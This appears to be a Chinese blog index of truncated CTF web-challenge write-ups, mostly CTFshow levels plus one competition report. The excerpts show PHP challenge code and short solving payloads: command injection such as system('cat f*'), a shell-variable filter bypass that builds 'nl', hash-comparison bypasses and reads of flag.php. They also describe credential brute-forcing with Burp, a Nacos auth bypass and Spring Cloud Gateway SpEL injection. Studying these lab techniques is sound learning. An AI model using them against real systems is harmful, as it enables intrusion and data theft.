web151、web152前端校验根据提示，检验写在了前端。 1234567891011121314151617181920layui.use('upload', function(){ var upload = layui.upload; //执行实例 var uploadInst = upload.render({ elem: '#upload' //绑定元素 ,url: '/upload/' //上传接口 ,done: function(res){ if(res.code==0){ $("#result").html("文件上传成功，路径："+res.msg); }else{ $("#result").html("文件上传失败，失败原因："+res.msg); } } ...

web10612345678910highlight_file(__FILE__);include("flag.php");if(isset($_POST['v1']) && isset($_GET['v2'])){ $v1 = $_POST['v1']; $v2 = $_GET['v2']; if(sha1($v1)==sha1($v2) && $v1!=$v2){ echo $flag; }} 数组和转为0e都行，这里图省事使用了数组绕过。 web107 parse_str12345678910111213highlight_file(__FILE__);error_reporting(0);include("flag.php");if(isset($_POST['v1'])){ $v1 = $_POST['v1']; $v3 ...

战队答题情况排名：282 解题列表Web BackendService Pwn 烧烤摊儿 funcanary Misc 签到卡 pyshell 网络安全人才实战能力评价现状调查问卷 Re babyRE ezAndroid Crypto 基于国密SM2算法的密钥密文分发 Sign_in_passwd WebBackendService在nacos权限绕过漏洞，网上找了一个payloadnacos抓包，修改返回包中参数，登录https://xz.aliyun.com/t/11493#toc-5对源码进行审计发现springcloud3.05 spel注入漏洞，在新建配置文件，名为backcfg 12345678910111213141516171819202122232425262728{ "spring": { "cloud": { "gateway": { "routes": [ { ...

web89123456789101112include("flag.php");highlight_file(__FILE__);if(isset($_GET['num'])){ $num = $_GET['num']; if(preg_match("/[0-9]/", $num)){ die("no no no!"); } if(intval($num)){ echo $flag; }} 遇事不决先试试数组捏，?num[]=1 web9012345678910111213include("flag.php");highlight_file(__FILE__);if(isset($_GET['num'])){ $num = $_GET['num']; if($num==="447 ...

参考链接： https://blog.csdn.net/weixin_46081055/article/details/121721209 web118题目里面提示了：flag in flag.php随便提交一点东西，看到源代码中：post上传然后system执行，但是没有回显。但是输入会出现evil input，因此想到可能是有过滤。fuzz一下：发现有的字符被过滤掉了：剩余的字符有A-Z，;:{}?#$_,@~看了wp学了一个新姿势：以下是在本地测试的。我们到web测试一下：web上的用户名末尾为l，path末尾为n，因此我们可以尝试组合： 1${PATH:~A}${PWD:~A}$IFS????.??? 组合成为nl查找文件。当然也有使用别的字段的方法： 12345SHLVL是记录多个 Bash 进程实例嵌套深度的累加器,进程第一次打开shell时${SHLVL}=1，然后在此shell中再打开一个shell时${SHLVL}=2。${ ...

web58123456if(isset($_POST['c'])){ $c= $_POST['c']; eval($c);}else{ highlight_file(__FILE__);} 正常来说，看到这个格式，我们第一个想到的就是使用system然后命令执行，但是当我们尝试使用时会发现：这是因为php.ini配置中默认禁用了执行系统外部命令函数，但是这里我们可以用php内置函数来读取文件，因此这部分学习的时php相关函数的使用。我们需要先查看当前目录。c=print_r(glob("*"));或者c=print_r(scandir('.'));（注意两者的返回数组内容不同）我们直接显示代码就行。post传参，c=highlight_file('flag.php');或者show_source(__FILE__); web59-65题可能出错了，和58一模一样… web66123456if(isset($_POST['c']) ...

web42123456if(isset($_GET['c'])){ $c=$_GET['c']; system($c." >/dev/null 2>&1");}else{ highlight_file(__FILE__);} 在变量后面拼接了一堆字符串。在此之前，我们需要先思考这一串是什么东西。 1>/dev/null 2>&1 就是让标准输出重定向到/dev/null中（丢弃标准输出），然后错误输出由于重用了标准输出的描述符，所以错误输出也被定向到了/dev/null中，错误输出同样也被丢弃了。执行了这条命令之后，该条shell命令将不会输出任何信息到控制台，也不会有任何信息输出到文件中。因此这个也被成为数据黑洞（还是很形象的）。这部分的bypass是双写，让后面的指令结果进入黑洞，但是保全前面的命令。比如说：?c=ls;ls，这就出现了运行结果。于是payload也就很容易得到了：?c=tac ...

web2912345678910error_reporting(0);if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag/i", $c)){ eval($c); } }else{ highlight_file(__FILE__);} 很简单的一道题。?c=system("ls");查看一下发现flag.php就在当前目录下，因为过滤了flag字节，所以直接用f*代替就行payload：?c=system("cat f*");flag在源代码中。 其他解法 除此之外，我们可以将文件复制一份修改为其他名字。 payload：?c=system("cp f* a.txt");然后直接访问或者cat访问都可以获得flag。 或者使用tac从后往前输出内容c=system("tac f*&q ...

相关文章及参考资料 暴力破解(生成字典、爆破服务、爆破登录、解密、BurpSuite工具讲解) PS做完了我才发现这些题的字典实在web21里面需要下载… web21 爆破什么的，都是基操 burpsuite爆破：https://www.cnblogs.com/007NBqaq/p/13220297.html 直接展示登陆界面，随便输点什么，抓包，可以发现把账号密码放在了请求头中，并且根据末尾的==可以看出是base64加密，因此我们直接尝试Intruder模块爆破。原理我们都懂，但是我们该如何操作呢？ 方案一 burpsuite爆破将请求转入intruder，因为会拼接payload，所以使用基本的sniper类型就行，在payload sets里面修改payload tpe为Custom Interator，并且在payload option中按照顺序修改三个position。而且我们观察可以注意到，我们还需要将payload使用base64加密，因此在payload processing里面添加转换：最后再将末尾的转义关闭。这种情况下爆破即可。 方 ...